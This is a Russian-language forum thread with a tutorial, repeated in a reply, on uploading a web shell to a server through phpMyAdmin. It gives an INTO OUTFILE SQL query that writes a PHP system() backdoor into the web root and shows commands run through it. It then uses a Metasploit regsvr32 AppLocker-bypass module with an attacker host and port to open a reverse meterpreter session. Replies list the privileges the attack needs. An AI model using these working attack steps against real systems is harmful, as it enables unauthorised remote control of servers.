Статья Загрузка shell в WEB-сервер. PhpMyAdmin

Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP, о нем я уже писал в этой статье => https://codeby.net/threads/xampp-web-server.59098/

Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.

upload_2017-2-12_22-39-40.png


Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь:

>

Заходим в панель управления phpmyadmin и создаем новую базу данных:

upload_2017-2-12_22-40-0.png


Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.

> SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

upload_2017-2-12_22-40-36.png


Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:

upload_2017-2-12_22-45-22.png


Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.

> 127.0.0.1/backdoor.php?cmd=systeminfo

upload_2017-2-12_22-47-7.png


Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.

Запускаем Msfconsole и используем следующий эксплоит:

> use exploit/windows/misc/regsvr32_applocker_bypass_server

> set lhost 172.16.0.192

> set lport 4444

> exploit

upload_2017-2-12_22-47-47.png


Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=

> 127.0.0.1/backdoor.php?cmd=выделенный текст

upload_2017-2-12_22-48-6.png


Как результат, получаем активную сессию meterpreter:

upload_2017-2-12_22-48-26.png


На этом все. Спасибо за внимание.
 
Есть такие люди, использующие венду, как сервер?
 
Есть такие люди, использующие венду, как сервер?
а как Вы думаете , .asp и .aspx на какой платформе работают ? (я в курсе что что при лицензировании можно и на никсах запустить)
 
Забыли сказать об одной особенности. Что бы всё это заработало MySQL сервер должен быть запущен с file_priv=yes
 
  • Нравится
Реакции: SoloSubtle и Vander
Забыли сказать об одной особенности. Что бы всё это заработало MySQL сервер должен быть запущен с file_priv=yes
Особенности здесь вообще не стоит затрагивать, так как на боевых серваках тяжело порой найти корень сайта, чтобы записать туда свой скрипт. Вот было так и имеешь доступ к phpMyAdmin и даже функция into outfile разрешена, но увы).
Еще особенность у пользователя должны быть права на запись в дирректорию сайта.
 
Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP, о нем я уже писал в этой статье => https://codeby.net/threads/xampp-web-server.59098/

Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.

Посмотреть вложение 8983

Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь:

>

Заходим в панель управления phpmyadmin и создаем новую базу данных:

Посмотреть вложение 8984

Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.

> SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

Посмотреть вложение 8985


Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:

Посмотреть вложение 8986

Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.

> 127.0.0.1/backdoor.php?cmd=systeminfo

Посмотреть вложение 8987


Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.

Запускаем Msfconsole и используем следующий эксплоит:

> use exploit/windows/misc/regsvr32_applocker_bypass_server

> set lhost 172.16.0.192

> set lport 4444

> exploit

Посмотреть вложение 8988

Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=

> 127.0.0.1/backdoor.php?cmd=выделенный текст

Посмотреть вложение 8989

Как результат, получаем активную сессию meterpreter:

Посмотреть вложение 8990

На этом все. Спасибо за внимание.
Добавьте пожалуйста команды для Linux, если таковые уместны.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!